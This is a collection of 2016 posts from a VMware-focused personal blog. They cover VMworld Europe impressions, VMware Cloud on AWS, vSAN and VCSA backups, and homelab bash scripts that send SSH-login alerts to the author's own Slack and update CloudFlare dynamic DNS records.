# VMworld Europe 2016 - My takeaways

URL: https://vNinja.net/vmware-2/vmworld-europe-2016-my-takeaways/
Date: 2016-10-31
Author: christian
Tags: conference, vDM30in30, VMware, vmworld

VMworld Europe 2016 in Barcelona is a couple of weeks old now, and most of the dust has settled. Besides the general announcements around vSphere 6.5 and surrounding products, the next big thing might just be Cross-Cloud Architecture and of course VMware Cloud on AWS. The announcements around vSAN 6.5 (yes, it is now vSAN and not Virtual SAN/VSAN anymore) are also very interesting.
Perhaps it’s time I revisit my earlier VMware VSAN; More than meets the eye post and update it for vSAN 6.5?

What really stands out after having time to digest it is how VMware and VMworld felt energetic again. The keynotes were good, especially on day 1. That keynote is probably the best VMware keynote I’ve ever seen. Everything VMware has been talking about for years, perhaps without actually being able to get the message clearly across to everyone, seems to click neatly into place now. There is a vision now, a vision you can actually relate to, and believe in. Even the tagline, *be_Tomorrow*, makes more sense now.

I don’t know if anyone else has noticed, but it feels like something has changed internally in VMware in the last year and a half or so. There seems to be a new drive, a clearer focus. To be frank, it feels fun again, something it really hasn’t for the last couple of years.

As per usual, my biggest take-away from attending VMworld is networking and talking to real-life people — the same people I “talk” to virtually all the time. I even met quite a few new people this year, and that’s always awesome!

My Session highlights #

I attended a few sessions too, and would like to highlight two of them:

- SDDC8414 - VMware Validated Design for SDDC: A Technical Deep Dive
- INF7849R - VMware Cloud on AWS – A Closer Look

Both these sessions were awesome. If you work as an architect and haven’t had a look at VMware Validated Designs yet, drop what you’re doing and go have a look. Right now. VMware Cloud on AWS was a little light on details (naturally, since it’s not even released/available yet), but for now this one gave a really good overview of what it is, and perhaps more crucially what it isn’t.

Other highlights #

As a VMUG Leader I attended the VMUG Leader Lunch, which had an awesome Q&A session with Pat Gelsinger and Joe Baguley — that session should have been recorded too.
I met up with Ed and Chris; all three hosts of vSoup were finally in the same city at the same time, for the first time since 2011! We recorded a quick vSoup Podcast, and even got Emad Younis as a surprise guest. That recording is still unreleased; hopefully we can get the audio cleaned up and get it published pretty soon.

Overall #

VMworld 2016 has left me happy. Happy with the direction VMware is going, happy with the event, and really happy I wore that shirt for the vRockstar party. As a side note, my FitBit logged 108,427 steps while I was in Barcelona, not too bad for under a week’s worth of conference. Now, can someone tell me where VMworld Europe 2017 will be held?

---

# Me too: VMware Cloud™ on AWS

URL: https://vNinja.net/news/me-too-vmware-cloud-on-aws/
Date: 2016-10-14
Author: christian
Tags: AWS, Cloud, Speculation, VMware

After yesterday’s announcement of VMware Cloud™ on AWS, everyone and their distant relatives have published their opinion pieces on the relevance of the deal, and on who got the short end of the stick. I guess this is my attempt, or me too post if you will.

First off, the best source for actual facts and not conjecture, besides the press releases and actual announcement, is Frank Denneman’s VMware Cloud™ on AWS – A Closer Look post (and by the way, it just feels right that Frank is back at VMware). So far, not many details are available (naturally, since it’s a tech preview that hasn’t even entered the beta stage yet), but we know this:

- It’s not a nested environment; it’s VMware SDDC running on physical hardware hosted in Amazon data centers.
- Your “old” management tools will be supported. Use VDP for backup, or PowerCLI to manage your environment? You can continue to do so, even if the workloads run in AWS.
- vMotion will be supported, making it possible to migrate workloads directly.
- AWS provides the hardware, VMware provides the stack and supports it.

So far, so good.
Being able to run some of your services on AWS, without conversion, makes sense. But that’s not really all that different (yes, there are probably subtle differences, but still) from vCloud Air, Softlayer or any of the vCAN partners. There might be a difference in pricing, but that’s unknown for now.

My take on it is as follows: What has been announced now is basically a private cloud operating in a public cloud, enabling you to create a hybrid cloud. At the moment it’s missing direct integration with existing AWS services (other than workload proximity lowering latency). Elastic Scaling is the new name for Cloudbursting. But as far as I can see, this is just the beginning.

A lot of comments on this take the view that this is a short-term gain for VMware, but a long-term gain for AWS. If anyone thinks that Jeff Bezos and Pat Gelsinger only think 6-12 months ahead, they need to get their head checked. This is a long-term play by both parties, no doubt about it. Look at what VMware is doing with containers. Look at what AWS is doing with their cloud services. Now tell me that their only thoughts are short-term.

I have no inside information about what is going on here, but Elastic Scaling (or ElasticDRS) sounds like it might be really interesting. The ability to move workloads to AWS on demand, if you exhaust your local resources? Price it like S3, with low-cost availability of resources that cost (a lot) more when used. It’s a move from CAPEX to OPEX anyway, and might make larger scale infrastructures easier to consume for the people in accounting.

Of course, this is aimed at competing with Azure. That’s the common enemy that makes AWS and VMware combine their forces. AWS has a massive advantage in cloud services; VMware owns most local datacenters. And let’s not kid ourselves, not all applications are going to be cloud applications. There are still a lot of mainframes out there that in theory should have been replaced by x86 workloads years ago.
The fact is that even though technology evolves, we still run around managing technical debt up the wazoo. Not having to run “legacy” x86 workloads in your local DC is a big deal. In that regard the AWS deal offers nothing you couldn’t already get through other avenues, but having the AWS name behind it ticks a lot of boxes. The combination of these two, as the service offering evolves, is going to be interesting. Really, really interesting, and what has been announced so far is just the beginning.

I’ll offer one small piece of advice in the end here: start learning AWS tools and infrastructure. You, as a seasoned VMware veteran or architect, will need it in the not-so-distant future. Trust me on this.

---

# macOS: Secure Pipes

URL: https://vNinja.net/osx/macos-secure-pipes/
Date: 2016-10-14
Author: christian
Tags: macOS, Proxy, SSH, Tunnels

Since I set up a public jumphost for my homelab/network, I’ve been looking for an easy way to manage my SSH tunnels. After trying a couple of different managers, I’ve chosen to use Secure Pipes. This little piece of free software allows you to easily manage SSH tunnels, with features like Remote Forwards, Local Forwards and SOCKS proxies. It runs in the menu bar, and makes connections easily available. It even reconfigures your network settings to use the SOCKS proxy, if allowed to. It also uses my private SSH keys to authenticate to the jumphost, which makes me a happy user. Free and easy to use, what’s not to love?

---

# Patch those Dell Servers easily!

URL: https://vNinja.net/hardware/patch-those-dell-servers-easily/
Date: 2016-10-10
Author: christian
Tags: Dell, Patching, Server, Update

Did you know that Dell has a bootable Linux ISO with firmware upgrades for their servers available? Neither did I, but luckily I found it today when needing it at a customer site.
Check out Updating Dell PowerEdge servers via bootable media / ISO, where you can download bootable ISOs for specific server models and get all your firmware upgraded in one fell swoop. Be warned though, it takes quite some time to run through it all (125 update packages in this instance), but it sure beats installing manually, or creating your own bootable ISO with the Dell Repository Manager, or even using the Dell Server Update Utility. Especially when it’s been a while since the server has been patched; the ones I used this on had not been touched since 2012…

Fire and forget via iDRAC - I like that. Just make sure you update the iDRAC before you boot the ISO, or you might just get disconnected mid-way and have to start over.

---

# Logging SSH logins to Slack

URL: https://vNinja.net/homelab/logging-ssh-logins-to-slack/
Date: 2016-10-06
Author: christian
Tags: Awesome, Homelab, HomeLabOps, Slack

I’m using Slack to alert and log a few things in my environment, and one of the things I use it for is to alert me if someone logs on via SSH to my public facing Jumphost. For a good walkthrough on how to set up such a host, check out Tunnel all your remote connections through ssh with a linux jumpbox by Luca Dell’Oca. My Ubuntu 16.04 Jumphost is set up to only accept Key-Based Authentication, to secure it as much as possible, but I would still like to get an instant notification if someone logs into it interactively.

How to set up SSH login notification to Slack #

First of all, we need an Incoming WebHook in Slack in order to receive the notifications. You configure those from the **Apps & Integration** menu item. This in turn opens up the Slack App Directory; find Build on the top right and then choose Make a Custom Integration. Once you are in the Build a Custom Integration section, find (or search for) Incoming WebHooks and select that. Next up, define which Slack channel should be the integration point, and click on Add Incoming WebHooks integration.
Copy the Webhook URL presented on the next screen. Note: keep this one a secret; anyone with access to this URL will be able to post to your Slack channel.

On my Ubuntu 16.04 Linux jumphost I’ve created a small bash script called /etc/ssh/notify.sh. This script utilizes _curl_ and the WebHook URL to post information directly to Slack. The script looks like this:

notify.sh

```bash
#!/bin/sh
url="https://hooks.slack.com/services/*********"
channel="#messages"
host="`hostname`"
content="\"attachments\": [ { \"mrkdwn_in\": [\"text\", \"fallback\"], \"fallback\": \"SSH login: $USER connected to \`$host\`\", \"text\": \"SSH login to \`$host\`\", \"fields\": [ { \"title\": \"User\", \"value\": \"$USER\", \"short\": true }, { \"title\": \"IP Address\", \"value\": \"$SSH_CLIENT\", \"short\": true } ], \"color\": \"#F35A00\" } ]"
curl -s -X POST --data-urlencode "payload={\"channel\": \"$channel\", \"mrkdwn\": true, \"username\": \"ssh-bot\", $content, \"icon_emoji\": \":computer:\"}" $url
# Hand the user a shell once the notification has been sent
/bin/bash
```

Replace the WebHook URL with your own from the step above, set which channel to post to, and you should be ready to go. This script logs the username and the IP address the connection comes from, and then posts it to the Slack WebHook with the help of curl.

Note: I’ve chosen to include the WebHook name etc. in the script itself, instead of via the WebHook definition on Slack, mostly since I don’t want to create a WebHook for every host I want logging from. With this setup, I can just change the username part of the curl command. It already logs the hostname, so this is pretty much superfluous, but hey, that’s how I made it.

Run chmod +x /etc/ssh/notify.sh to make it executable, and test it. If everything works as expected, you should see an immediate log entry in your chosen Slack channel. In order to make this script run every time someone logs into the Jumphost, I added a ForceCommand to the end of my `/etc/ssh/sshd_config` file, like this:

```
ForceCommand /etc/ssh/notify.sh
```

And that’s it.
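One caveat worth noting: ForceCommand replaces whatever command the client requested, for every session on the host, so scp and sftp sessions will also end up running the notification script (and its trailing /bin/bash) instead of what they asked for. If that bites you, sshd_config can scope the override with a Match block. A hypothetical sketch - the excluded account name is just an example, not from my actual setup:

```
# /etc/ssh/sshd_config (sketch)
# Wrap sessions for everyone except a hypothetical automation account
Match User *,!backupuser
    ForceCommand /etc/ssh/notify.sh
```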
A login via SSH on the Jumphost now looks like this in my Slack channel:

How awesome is that? Of course, this just scratches the surface of what is possible with Slack’s Incoming WebHooks. I’m using a similar approach for logging new devices discovered in phpipam, but that’s for another post.

---

# HomeLabOps via Slack

URL: https://vNinja.net/homelab/homelabops-via-slack/
Date: 2016-10-06
Author: christian
Tags: Alerting, fun, Slack, Webhook

Just like Lior Kamrat I’ve set up my own private Slack for messaging and alerting from various services running both in my lab and some external facing services. It’s only been running a few days, but so far it works brilliantly and helps me keep track. So far, I’ve set up Slack alerting and/or integrations for the following items:

- StatusCake monitoring for vNinja.net and other public facing web services
- Todoist integration
- Pocket: New items added to Pocket get announced via Zapier.
- Incoming Slack webhooks
- Windows application that sends status messages
- phpipam: If a new device is detected in my local network, send a notification
- Jumphost: Just like Luca I have a public facing Linux JumpHost that I tunnel traffic through. I’ve set up an alerting mechanism that sends a Slack notification if someone logs into the JumpHost.
- If my public IP changes, it gets updated and Slack gets notified.
- WordPress events, like new posts or comments, are also announced via the WP-Slack plugin.

I’m sure I’ll add other things to this as time passes. I plan on publishing something on how I’ve hacked some of this together, I just need to clean up the code a bit and make it ready for publication first.

---

# VMworld 2016 Europe

URL: https://vNinja.net/virtualization/vmworld-2016-europe/
Date: 2016-10-06
Author: christian
Tags: Barcelona, conference, vmworld

VMworld Europe is just a couple of weeks away now, and I can’t wait to spend a week in sunny Barcelona. Last year my trip got cancelled at the last minute, but that will not be the case this year.
As usual I’m looking forward to a bunch of sessions, and general announcements, but for me the value of attending VMworld is in the networking with other people. Sessions and keynotes can be reviewed later; interacting with others cannot. A lot of the people I get to meet while at VMworld are people I interact with often, but seldom meet face to face. For me, that is the true, and perhaps somewhat hidden, value of attending. Tech skills are great, but it’s the soft skills that make you stand out. So, come look for me at the blogger table and say hi! I suspect that’s where I’ll spend most of my time.

---

# Goodbye PernixData FVP and Architect

URL: https://vNinja.net/news/goodbye-fvp-and-architect/
Date: 2016-09-29
Author: christian
Tags: Nutanix, PernixData

As we all know by now, PernixData was gobbled up by Nutanix a while back, and since then there has been nothing but silence on the future of the FVP and Architect products. Now it seems it’s over. The acquisition triggered a bunch of PernixData employees moving elsewhere, and now it’s the products’ time to move on as well. From what I’m hearing, End of Sale and End of Life for both products are due to be announced soon. Existing support contracts will be honored, but will not be renewable beyond the current time frame. By the looks of it, FVP and/or Architect will be built into the Nutanix stack, and not be available as standalone products anymore. I’ve been a huge supporter of PernixData FVP, and even implemented some of the first solutions delivered in Norway, and I’m really sad to see it disappear as an independent solution.

---

# CloudFlare Dynamic DNS Update Script (cf-ddns.sh)

URL: https://vNinja.net/homelab/cloudflare-dynamic-dns-update-script-cf-ddns-sh/
Date: 2016-08-13
Author: christian
Tags: Bash, Cloudflare, Dynamic DNS, Homelab, Scripting

As a part of my Homelab project, I’ve created a proper bash script to provide dynamic DNS updates for external resources, via CloudFlare.
More details on the reasoning behind it can be found in Using CloudFlare for Dynamic DNS, but since that was posted I’ve fleshed the script out quite a bit more. The new and updated script can be found on GitHub: cf-ddns.sh. It now writes events to syslog when it runs, so you can use VMware Log Insight (or another log solution) to capture the events, and use them to track public IP changes if you want. I’ve also added a -f parameter, so you can force an IP update even if the values have not changed since the last run. It’s pretty self-explanatory: just replace your own values from CloudFlare for the variables, and if you want to update more than one record, just copy the update block and edit it for the extra entries. Hopefully someone will find this useful.

---

# Using CloudFlare for Dynamic DNS

URL: https://vNinja.net/homelab/using-cloudflare-for-dynamic-dns/
Date: 2016-08-09
Author: christian
Tags: API, Cloudflare, DNS, Dynamic DNS, Homelab, Scripting

In my previous post, I tried to lay out the foundation and reasoning behind requiring a Dynamic DNS service, and here is how I solved it using CloudFlare.

First of all, I moved my chosen domain name to CloudFlare, and made sure everything resolved OK with static records. Once that was working, I started playing around with the CloudFlare API, using Cocoa Rest Client. I’m no developer (as is probably very apparent by the script below), nor an API wizard of any kind, but it was fairly easy to figure out how to craft a request that lists my DNS zone. By using the List DNS Records query, I found the unique ID for the hostnames I wanted to update, and created a new Update DNS record query to update it with a new IP address. Since the Cocoa Rest Client is pretty clever, it has an option to “Copy Curl Command”, which basically gives you a preformatted curl command to run the query you just crafted in it. Pasting that into a Terminal window on my Mac verified that it worked as intended.
From there on, I simply wrapped these commands in a little bash script, to avoid hitting the API unless there was an actual public IP change. In the end, my script ended up looking like this.

UPDATE: #

I’ve published a more fleshed out script on GitHub, details here.

NOTE: You will need to fill out your own values for {TOKEN}, {EMAIL}, {DOMAIN}, {ID} and {HOSTNAME} in the two update requests for this to work for you.

cloudflare-ddns.sh

```bash
#!/bin/sh

# Get the current public IP
MYIP=$(curl ifconfig.me/ip)
OLDIP=`cat oldip.txt`

echo "Current public IP is:" $MYIP

if [ "$MYIP" = "$OLDIP" ]
then
    echo "No change detected. Exiting"
else
    echo "IP change detected, updating CloudFlare"
    #WEB01
    curl -k -L -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'a=rec_edit&tkn={TOKEN}&email={EMAIL}&z={DOMAIN}&id={ID}&type=A&name={HOSTNAME}&ttl=1&content='$MYIP 'https://www.cloudflare.com/api_json.html'
    #WEB02
    curl -k -L -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'a=rec_edit&tkn={TOKEN}&email={EMAIL}&z={DOMAIN}&id={ID}&type=A&name={HOSTNAME}&ttl=1&content='$MYIP 'https://www.cloudflare.com/api_json.html'
    echo $MYIP > oldip.txt
fi
```

Explanation #

First off, the script checks what the current public IP is, then goes on to compare that with the stored IP address in the oldip.txt file. If it matches, it ends execution, as there is no need to update the public records. If there is a mismatch between the two, it goes on to execute the requests to CloudFlare, replacing the currently configured IP with the new IP address stored in the $MYIP variable. It then writes the new IP address to the oldip.txt file and exits. Configure this as a cronjob that runs every 5 - 10 minutes or so and you’re set! Simple, not pretty, but oh-so awesome!
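The cronjob itself is a one-liner. A sketch, assuming the script lives at /usr/local/bin/cloudflare-ddns.sh (the path is an example; adjust the schedule to taste):

```
# Run the updater every 5 minutes, appending output to a log for troubleshooting
*/5 * * * * /usr/local/bin/cloudflare-ddns.sh >> /var/log/cf-ddns.log 2>&1
```

Since the script reads and writes oldip.txt relative to the current working directory, it’s worth using absolute paths (or cd-ing to a fixed directory first) when running it from cron.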
---

# Dynamic DNS Requirements

URL: https://vNinja.net/homelab/dynamic-dns-requirements/
Date: 2016-08-09
Author: christian
Tags: Cloudflare, DNS, Dynamic DNS, Homelab, Scripting

While working on my new Homelab setup, I’ve been investigating ways to provide hostname-based access to several web services located in my DMZ zone. Since my provider doesn’t provide static IP addresses, I also need an external Dynamic DNS service, to provide said hostname mappings through the reverse proxy on the inside. There are loads of Dynamic DNS services available; most of them let you use some sort of predefined domain name scheme, and point it to your external IP, but I wanted to use a domain name that I own and control. Since I use CloudFlare to provide DNS services (amongst other things) for this very site, it was a natural choice to see if they could fit the bill for my lab needs as well. Turns out, not only can they provide the services I need for free, they also allow me to play around and have fun at the same time!

My setup looks like this #

Logical Web Services Access Diagram

As seen in the diagram, the setup is pretty simple. As far as Dynamic DNS requirements go, all I need to be able to do (for now) is to update the IP address for a couple of A records for my domain, if my external IP changes. This in turn makes the reverse proxy work, since it redirects traffic based on hostname when there is an incoming request. CloudFlare offers several methods to update the records, including ddclient, but that requires Perl, and frankly that’s no fun at all. What is fun, however, is updating A records directly through the CloudFlare API, so that’s the route I headed down. I moved the domain name I want to use for external access to my lab over to CloudFlare, and rolled my own small Dynamic DNS updater, all within an hour or so of actual work.
Not bad at all, especially considering I didn’t even know they provided the possibility to do so, or that they provide a public API you can play with. In the next post in this series, I’ll show how I solved it with some simple API calls and some bash scripting.

---

# Veeam vCenter Migration Utility

URL: https://vNinja.net/virtualization/veeam-vcenter-migration-utility/
Date: 2016-08-08
Author: christian
Tags: Backup, Backup & Replication, MoRef, vCenter, Veeam

Way back in 2013, I published Preserve your Veeam B&R Backups Jobs when Moving vCenter, outlining how to “cheat” (by using a CNAME alias) to preserve your Veeam Backup & Replication jobs if you replace your VMware vCenter. Naturally, when there is a new vCenter instance, all the Virtual Machine Managed Object References (MoRefs) change, which makes Veeam Backup & Replication start a new backup/replication chain, since all VMs are treated as new ones. Not ideal by any means, but at least you wouldn’t have to recreate all your jobs. Veeam has now made a tool available that can map old MoRefs to new MoRefs in your backup jobs, in order to keep your incremental chains intact even after replacing your vCenter. Check out the vCenter Migration Utility!

---

# Taking IT too Far

URL: https://vNinja.net/news/taking-it-to-far/
Date: 2016-07-19
Author: christian
Tags:

A few days ago I decided to go full-on mad scientist in documenting my new home lab / network setup, and I’ve even created a GitHub repository for it. The idea is to create a framework for developing this kind of documentation, heavily influenced by the VCDX methodology and framework. Over time, Conceptual, Logical and Physical designs will be added, as well as configuration settings and operational procedures. Hopefully it’ll also contain some useful diagrams. There are even Executive Summary and Business Background sections, which admittedly make no sense at all in this setting, but as an exercise in writing such documents they certainly serve a purpose.
It’s built using Markdown as the markup language, which makes it easy to edit, revise and ultimately maintain as a source-controlled collection of documents. This is very much a work in progress, but if you have any input, criticisms or pure snark, bring it on! Of course, since this is my own personal home lab, it’s not quite up to par with a real enterprise architecture, but it’s still real to me. Now, where is my lab coat again?

---

# Top vBlog 2016: Thank you!

URL: https://vNinja.net/news/top-vblog-2016-thank-you/
Date: 2016-07-09
Author: christian
Tags: contest, Happy Dance, TopvBlog

While I was away on a two-week holiday on Croatia’s sunny Makarska Riviera, Eric Siebert announced the results of his annual Top vBlog, and much to my surprise vNinja did quite the jump from last year’s 46th spot to this year’s 27th! Honestly, I thought the site would drop out of the top 50 list this year, but once again I’m proven to be mistaken. Sometimes being wrong is just great! Not only that, but in the Favorite Independent Blogger category, I also did a small hop from 7th to 6th. Obviously this makes me very happy, and I wish to thank everyone who voted for the site this year. Also, if you happen to meet Eric at VMworld, or anywhere else this year, buy the guy a beer. Or three. He like totally deserves it.

---

# vSphere Platform Services Controller (PSC) topology and Omnigraffle

URL: https://vNinja.net/virtualization/vsphere-platform-services-controller-psc-topology-and-omnigraffle/
Date: 2016-05-22
Author: christian
Tags: automation, Omnigraffle, PSC, Script, Topology, vSphere

A little while ago William Lam published a little Python script called extract_vsphere_deployment_topology.py that basically lets you export your current vSphere PSC topology as a DOT (graph description language) file. Great stuff, and in itself useful as is, especially if you run it through webgraphviz.com as William suggests.
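For reference, DOT files are plain text; a minimal, hypothetical example of what a small exported topology might look like (the hostnames are invented, and the real script’s output will differ in detail):

```
digraph pscTopology {
    "psc01.lab.local" [shape=box];
    "vcenter01.lab.local" -> "psc01.lab.local";
    "vcenter02.lab.local" -> "psc01.lab.local";
}
```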
The thing is, you might want to edit the topology map, change colours and fonts, and even move the boxes around, after you get the output. If you have a large environment, you might want to combine all your PSC topologies into a single document? It turns out that’s pretty easy to do! Omnigraffle Pro imports the DOT files natively, and lets you play around with the objects as if they were drawn in Omnigraffle from the beginning.

Save the output from the script somewhere as a .dot file. Then open Omnigraffle and go to File -> Open and select the file. Now, select the Hierarchical option, and you’ll get a nicely formatted canvas with your PSC components already laid out inside of Omnigraffle. Now you can edit it at will!

As far as I can tell, this isn’t possible with Microsoft Visio, as it doesn’t support the DOT format, but you could always save it as a Visio file with Omnigraffle if you need to send it to your more Microsoft-inclined friends. I’m sure there is more fun to be had with these DOT files; they’re just text files after all. Perhaps someone can even code up a script that converts them to Visio .vdx files or some other format that Visio can import natively.

---

# Let's get the kids some RPi's!

URL: https://vNinja.net/news/lets-get-the-kids-some-rpis/
Date: 2016-05-06
Author: christian
Tags: Awesome, Donation, Kids, RPi

A friend of Mr. Jase McCarty is teaching a class in programming control systems, and is in need of a few Raspberry Pi’s. Sadly the school can’t afford to buy them outright, so if you have one laying around that you are not using, get in touch with Jase and he’ll set you up with the details on how you can contribute! If you want to do even better, and buy some RPi’s outright and donate them to the project, check out this Amazon Wishlist! So far 7 RPi’s have been donated by the vExpert community, which in itself is pure awesome-sauce, but I’m sure we can one-up that and make sure each of the students has two RPi’s each.
---

# Top vBlog 2016

URL: https://vNinja.net/network/top-vblog-2016/
Date: 2016-05-03
Author: christian
Tags: vBlog, Voting

The Top vBlog 2016 voting has opened, go forth and vote for your favourites now - there are a lot of them to choose from!

---

# IT Architect: Foundation in the Art of Infrastructure Design: A Practical Guide for IT Architects

URL: https://vNinja.net/news/it-architect-foundation-in-the-art-of-infrastructure-design-a-practical-guide-for-it-architects/
Date: 2016-04-15
Author: christian
Tags:

Way back in late 2014 I volunteered to do technical review for a book called **IT Architect: Foundation in the Art of Infrastructure Design: A Practical Guide for IT Architects**. Due to a lot of unforeseen events, the book has been delayed quite a bit, but it’s finally available as hardcopy, paperback and eBook!

The book is written by John Yani Arrasjid, VCDX-001, Mark Gabryjelski, VCDX-023, and Chris McCain, VCDX-079, and as the title states it really does lay out the foundation of how to approach infrastructure design in a modern virtualised data center. I’m truly honored to have had a small part in the creation of what I consider to be a must-read for all existing and aspiring IT architects! It highlights methodology, but it also contains design processes through case studies with concrete examples. Grab a copy today, it’s well worth both the money and the time spent reading it. I can guarantee that you won’t only read this book once; you’ll be going back through it several times, as it is a treasure trove of real world experience that is hard to come by any other place. This is the first of a series of design books, so there are more goodies on the way!

---

# My Contribution to the vSphere Design Pocketbook v3

URL: https://vNinja.net/news/my-contribution-to-the-vsphere-design-pocketbook-v3/
Date: 2016-04-08
Author: christian
Tags:

PernixData, and Frank Denneman, have released vSphere Design Pocketbook v3.
As the title reads, this is the third time PernixData releases one of these books, and I’m honored to be selected amongst the contributors for the second time, this time with a chapter called “VCSA vs Windows vCenter - Which One Do I Choose, and Why?” Go grab your electronic copy now, and be sure to bug your local PernixData representative for a hard-copy later. I know I will.

---

# I'm honored. And a Bit Scared.

URL: https://vNinja.net/network/im-honored-and-a-bit-scared/
Date: 2016-04-05
Author: christian
Tags:

Yesterday was my first real day as a Senior Solutions Architect for Proact, and today I flew to Oslo for on-boarding and some face-to-face time with my new colleagues over there. By the looks of it, there are a lot of exciting things in the pipeline, and if we land the things we have started on, this should be interesting. Very interesting indeed.

In addition to the excitement around changing employers, and roles, some other things have also happened. Firstly, Veeam decided to award me the Veeam Vanguard title for 2016. I had the honour of being one of the inaugural members of this group in 2015, and I’m very happy to be included in the group once more. Secondly, VMware has announced the list of their EUC Champions for 2016. This program had a “soft-launch” in 2015, but has now gone official in 2016. I’m extremely honoured to extend my membership in this small group in 2016. Thirdly, a few days ago Issue 1, 2016, of VMUG Compass was published – and that includes an interview with me as well. It’s been quite a week so far, and it’s only Tuesday. Now, I need to go lay down for a bit…

---

# I Made Something Happen

URL: https://vNinja.net/news/i-made-something-happen/
Date: 2016-03-31
Author: christian
Tags: Change, EVRY, Proact, Role

I think Seth Godin might have been onto something with “Make something happen”, so I did. Today was my last day at EVRY.
Some might already have been aware of this, mostly because of Hoff-Job-Announcement-as-a-Service, but also because of my own tweet as I left the EVRY offices in Bergen as an employee for the last time:

So long and thanks for all the fish. pic.twitter.com/ur0wKjORDW — Christian Mohn™ (@h0bbel) March 31, 2016

The decision to leave EVRY was not an easy one, but it was time to try something else. I have nothing but respect for both the company and my now former colleagues, and I’m certain EVRY will continue its mission to become the Nordic IT champion - I’m also certain they will succeed. My new role is as a Senior Systems Architect for Proact IT Norge, with a focus on VMware’s SDDC stack. What that really means remains to be defined, but I’m excited to start this new endeavour and be given an opportunity to help Proact design the data centres of the future. Proact recently also won a Global VMware Innovation Award for 2016, so I guess I’m at the right place at the right time when I now join #teamproact. So, in the words of Jake and Elwood:

Elwood: It's 106 miles to Chicago, we got a full tank of gas, half a pack of cigarettes, it's dark... and we're wearing sunglasses.
Jake: Hit it.

---
# Running a vSAN PoC - Customer reactions
URL: https://vNinja.net/virtualization/running-a-vsan-poc-customer-reactions/
Date: 2016-02-24
Author: christian
Tags: Proof-of-Concept, storage, vSAN

I recently set up a VMware Virtual SAN 6.1 Proof-of-Concept for a customer, configuring a 3-node cluster based on the following setup:

Hardware #
- HP ProLiant DL380 G9
- 2 x Intel Xeon E5-2680 @ 2.50GHz w/12 cores
- 392 GB RAM
- 1 x Intel DC P3700 800GB NVMe
- 6 x Intel DC S3610 1.4TB SSD
- HP FlexFabric 556FLR-SFP+ 10GbE NICs

Virtual SAN Setup #
Since this was a simple PoC setup, the VSAN was configured with one disk group per host, with all 6 Intel DC S3610 drives used as the capacity layer and the Intel DC P3700 NVMe card set up as the cache.
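As a sanity check on FTT sizing: under vSAN's mirroring policy, each object is stored FTT+1 times, so effective capacity is the usable pool divided by FTT+1. A quick sketch of the arithmetic (Python purely for illustration; the 21.61TB figure is the usable pool reported for this cluster):

```python
def effective_capacity_tb(pool_tb: float, ftt: int) -> float:
    """Effective VM capacity under a vSAN mirroring policy:
    each object is written ftt+1 times, so divide the pool by ftt+1."""
    return pool_tb / (ftt + 1)

# 21.61 TB usable pool, Failures-To-Tolerate=1
print(round(effective_capacity_tb(21.61, 1), 1))  # → 10.8
```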
This gives a total of 21.61TB of usable space for VSAN across the cluster. With the Failures-To-Tolerate=1 policy (the only real FTT policy available in a three-node 6.1 cluster), this gives 10.8TB of usable space. vMotion and VSAN traffic were set up to run on separate VLANs over 2 x 10GbE interfaces, connected to a Cisco backend.

Customer reaction #
After the customer had been running it in test for a couple of weeks, I got a single-line email from them simply stating: “WOW!”. They were so impressed with the performance (those NVMe cards are FAST!) and manageability of the setup that they have now decided to order an additional 3 hosts, bringing the cluster up to a more reasonable 6 hosts in a metro-cluster setup, and to upgrade to VSAN 6.2 as soon as it’s available. The compression, deduplication and erasure coding features of 6.2 will increase their available capacity just by upgrading. At the same time, adding three new hosts will effectively double the available physical disk space as well, even before the 6.2 improvements kick in. VSAN will be this customer’s preferred storage platform going forward, and they can finally move off their existing monolithic, and expensive, FC SAN over to a storage solution that outperforms it and greatly reduces complexity.

---
# vCenter Server Appliance Backups
URL: https://vNinja.net/vmware-2/vcenter-server-appliance-backups/
Date: 2016-02-18
Author: christian
Tags: Backup, vCenter, VCSA, VMware

For some time now I’ve been advocating the use of the VCSA instead of the traditional Microsoft Windows-based vCenter. It has feature parity with the Windows version now, it’s easier to deploy, gets right-sized out of the box and eliminates the need for an external Microsoft SQL server.
One of the questions I often face when talking about the appliance is: _how do we handle backups?_ Most customers are comfortable with backing up Windows servers and Microsoft SQL, but quite a few have reservations when it comes to the integrated vPostgres database that the VCSA employs. One common misconception is that a VCSA backup is only crash-consistent. Thankfully, vPostgres takes care of this on its own, by using what it calls Continuous Archiving and Point-in-Time Recovery (PITR). In essence, vPostgres continuously writes everything to a log file first, so every transaction that should hit the DB is recorded and can be replayed after a system crash if required. From the Postgres documentation:

“We do not need a perfectly consistent file system backup as the starting point. Any internal inconsistency in the backup will be corrected by log replay (this is not significantly different from what happens during crash recovery). So we do not need a file system snapshot capability, just tar or a similar archiving tool.”

With regards to the VCSA, this means that your image-level backups will be consistent, and there isn’t really a need to dump and export the vPostgres DB and then archive that. Yet another reason to switch to the appliance today! Myth busted!

---
# Oh wow, it's already 2016.
URL: https://vNinja.net/misc/oh-wow-its-already-2016/
Date: 2016-02-03
Author: christian
Tags: 2016, Plans

A bit late, considering it’s already February, but here it is:

My plan for 2016 #
- Shake things up a bit - Go big or go home. 2016 will be a year of changes. It’s about time I shake things up a bit, and 2016 will be that year. More details on this to come later; for now I have to keep it under wraps.
- Get VCIX certified - I’ve signed up for the new 3V0-622: VMware Certified Advanced Professional 6 - Data Center Virtualization Design Beta Exam. This will be my first ever VMware beta exam.
If I fail that one, I will try again later in 2016 to obtain the VCIX certification.
- Keep vSoup on track - We’ve committed, at least to ourselves, that in 2016 we will record vSoup monthly.
- VMUG - The Norwegian VMUG is up and running, but I would like to get even better attendance records and more community contributions. The sponsors pay the bills, but the community contributions bring the most value. In the spirit of the Feed4ward program I’ll be happy to mentor/help anyone who wants to present at a VMUG meeting in Norway. I intend to arrange at least 3 VMUG meetings in Bergen in 2016.
- Attend an international industry conference - In 2015 I missed out on VMworld entirely, due to issues out of my control. My goal is to make sure I attend at least one industry conference this year, most likely VMworld 2016 in Barcelona.
- Code something - My ambition is that some time in 2016 I will code something. It’s very clear to me that even though I’m no developer by nature, a basic developer skill set is required by everyone these days. Me included. I’ll consider this my wildcard project for 2016, as I haven’t decided on what to do yet, or even how.

In general, I will continue writing and posting whenever I feel like it. I will also focus even more on public cloud offerings, and especially how to integrate them with existing on-premises solutions. Since these are more general goals that are hard to put into a measurable format, I’ll refrain from putting them down in the list as individual entries. Of course, the best-laid plans of mice and men often go awry; 2016 might just move me in other directions too.

---
# 2015: The verdict
URL: https://vNinja.net/misc/2015-the-verdict/
Date: 2016-01-30
Author: christian
Tags: 2015, Personal, Prediction

